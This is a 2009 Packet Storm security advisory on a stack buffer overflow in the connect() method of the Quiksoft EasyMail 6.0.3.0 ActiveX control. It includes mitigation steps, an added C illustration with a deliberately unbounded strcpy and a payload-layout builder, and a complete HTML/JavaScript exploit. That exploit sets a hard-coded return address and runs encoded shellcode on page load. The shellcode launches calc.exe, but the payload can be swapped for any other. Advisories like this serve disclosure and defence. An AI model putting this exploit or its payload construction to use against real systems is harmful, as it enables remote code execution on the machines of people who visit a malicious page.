Quiksoft EasyMail 6.0.3.0 IMAP connect() Stack Overflow

2009-09-18T00:00:00
ID PACKETSTORM:81433
Type packetstorm
Reporter Sebastian Wolfgarten
Modified 2009-09-18T00:00:00

Description

                                        
<!--
  
I - TITLE  
  
Security advisory: Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX stack overflow exploit
  
II - SUMMARY  
  
Description: A remotely exploitable stack-based buffer overflow in the Quiksoft
EasyMail 6.0.3.0 ActiveX component allows arbitrary code execution in the
context of the user running the browser.
  
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),  
http://www.devtarget.org  
  
Date: September 17th, 2009  
  
Severity: Medium (remote code execution in the user context)  
  
References: http://www.devtarget.org/easymail-advisory-09-2009.txt  
  
III - OVERVIEW  
  
Quote from quiksoft.com: "The EasyMail Products are relied upon by over
thousands of international corporations, federal, state and local
organizations, and individual developers. Quiksoft has established the
EasyMail products as 'the professional, reliable, and easy to use choice for
e-mail development'." More information about the product can be found online
at http://www.quiksoft.com.
  
IV - DETAILS  
  
Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX component that
facilitates the development of IMAP4-aware applications. The connect()
function of this component is prone to a classic stack-based buffer overflow:
when an overly long argument is passed, the component copies it into a
fixed-size stack buffer without checking its length, overwriting the saved
return address. Because any web page rendered in Internet Explorer can
instantiate the control by its CLSID and call connect() from script, the
flaw is reachable remotely and allows execution of arbitrary code in the
context of the user running the browser.
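As an added illustration (this is example code written for this page, not
Quiksoft's code, which the advisory does not show), the C below contrasts the
unbounded copy described above with a bounded version that rejects oversize
input, and builds the padding / return address / payload layout the HTML
exploit further down uses. The internal buffer size SERVER_NAME_MAX (256) is an
assumption, since the advisory gives no figure for the real buffer; the
441-byte padding and the 0x7D17DD0F return address are the exploit's own
constants.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the internal name buffer. The advisory does not give the
 * real size used by emimap4.dll; it only shows that 441 bytes of padding
 * reach the saved return address. */
#define SERVER_NAME_MAX 256

/* The pattern described in section IV: the connect() argument is copied into
 * a fixed-size stack buffer with no length check. Never call this with
 * attacker-controlled input; it exists only to show the defect. */
int imap_connect_vulnerable(const char *server)
{
    char name[SERVER_NAME_MAX];

    strcpy(name, server);   /* unbounded copy: smashes the stack once strlen(server) >= sizeof name */
    /* ... resolve `name` and open the IMAP session here ... */
    return 0;
}

/* Hardened form: measure the input without scanning past the buffer size,
 * reject anything that cannot fit with its terminator, then copy with an
 * explicit bound. Returns 0 on success, -1 when the input is rejected. */
int imap_connect_hardened(const char *server)
{
    char name[SERVER_NAME_MAX];
    size_t len = 0;

    if (server == NULL)
        return -1;
    while (len < sizeof name && server[len] != '\0')
        len++;
    if (len == sizeof name)
        return -1;              /* no terminator within the buffer size: too long */
    memcpy(name, server, len);
    name[len] = '\0';
    /* ... resolve `name` and open the IMAP session here ... */
    return 0;
}

/* Lay out the exploit's payload shape: pad_len filler bytes up to the saved
 * return address, the address in little-endian byte order, then the payload
 * (NOP sled and shellcode). Returns the number of bytes written, or 0 if
 * `out` is too small. */
size_t build_overflow_payload(unsigned char *out, size_t out_size,
                              size_t pad_len, uint32_t ret_addr,
                              const unsigned char *payload, size_t payload_len)
{
    size_t total = pad_len + 4 + payload_len;

    if (out_size < total)
        return 0;
    memset(out, 'A', pad_len);
    /* x86 is little-endian, so 0x7D17DD0F is written as 0F DD 17 7D,
     * which is exactly the "%0F%DD%17%7D" string in the HTML exploit. */
    out[pad_len + 0] = (unsigned char)(ret_addr & 0xff);
    out[pad_len + 1] = (unsigned char)((ret_addr >> 8) & 0xff);
    out[pad_len + 2] = (unsigned char)((ret_addr >> 16) & 0xff);
    out[pad_len + 3] = (unsigned char)((ret_addr >> 24) & 0xff);
    memcpy(out + pad_len + 4, payload, payload_len);
    return total;
}

/* Convenience for the demo: an all-'A' server name of the requested length. */
static char g_name[1024];
const char *filler_name(size_t len)
{
    if (len >= sizeof g_name)
        len = sizeof g_name - 1;
    memset(g_name, 'A', len);
    g_name[len] = '\0';
    return g_name;
}

int main(void)
{
    unsigned char nop_sled[12];
    unsigned char out[512];
    size_t n;

    memset(nop_sled, 0x90, sizeof nop_sled);
    /* Same constants as the exploit: 441 filler bytes, then 0x7D17DD0F. */
    n = build_overflow_payload(out, sizeof out, 441, 0x7D17DD0Fu,
                               nop_sled, sizeof nop_sled);
    printf("payload: %zu bytes, return address bytes at +441: %02x %02x %02x %02x\n",
           n, out[441], out[442], out[443], out[444]);
    printf("hardened connect, 16-byte name:  %d\n", imap_connect_hardened("imap.example.com"));
    printf("hardened connect, 441-byte name: %d\n", imap_connect_hardened(filler_name(441)));
    return 0;
}
```

The hardened version deliberately measures the string with its own bounded
loop rather than strlen(), so a missing terminator in attacker data cannot make
the length check itself read past the buffer size.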
  
V - MITIGATING MEASURES  
  
Either set the kill bit for the affected ActiveX control
(clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D), i.e. create the DWORD value
"Compatibility Flags" = 0x00000400 under
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0CEA3FB1-7F88-4803-AA8E-AD021566955D}
so that Internet Explorer refuses to instantiate it, or install the latest
version of Quiksoft EasyMail, which is not considered vulnerable. Note that
the kill bit only stops instantiation from Internet Explorer and other hosts
that honour it; applications that load emimap4.dll directly still contain
the flaw, so updating is the real fix.
  
VI - NOTES  
  
The code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis Provencher
for drawing my attention to Quiksoft EasyMail. The shellcode below is rather
harmless and merely executes calc.exe.
  
Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0  
  
-->  
  
<html>  
<head>  
<title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>  
<script language="JavaScript" defer>  
function Check() {

  // 441 bytes of filler: enough to reach the saved return address of connect()'s frame
  var buf = 'A';
  while (buf.length <= 440) buf = buf + 'A';

  // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378
  // Encoder=Alpha2 http://metasploit.com
  var shellcode1 =
  unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
  "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
  "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
  "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
  "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
  "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
  "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
  "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
  "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
  "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
  "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
  "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
  "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
  "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
  "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
  "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
  "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
  "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
  "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
  "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
  "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
  "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
  "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
  "%4e%31%75%74%38%70%65%77%70%43");

  // Overwritten return address, little-endian 0x7D17DD0F (Windows XP SP2 English)
  var eip = unescape("%0F%DD%17%7D");

  // 12-byte NOP sled placed before and after the shellcode
  var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

  // Layout: filler | saved return address | NOP sled | shellcode | NOP sled
  var m = buf + eip + nop + shellcode1 + nop;

  // The overlong argument triggers the unbounded copy in connect()
  obj.connect(m);
}
  
</script>  
</head>  
<body onload="JavaScript: return Check();">  
<object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">  
Failed to instantiate object.  
</object>  
</body>  
</html>  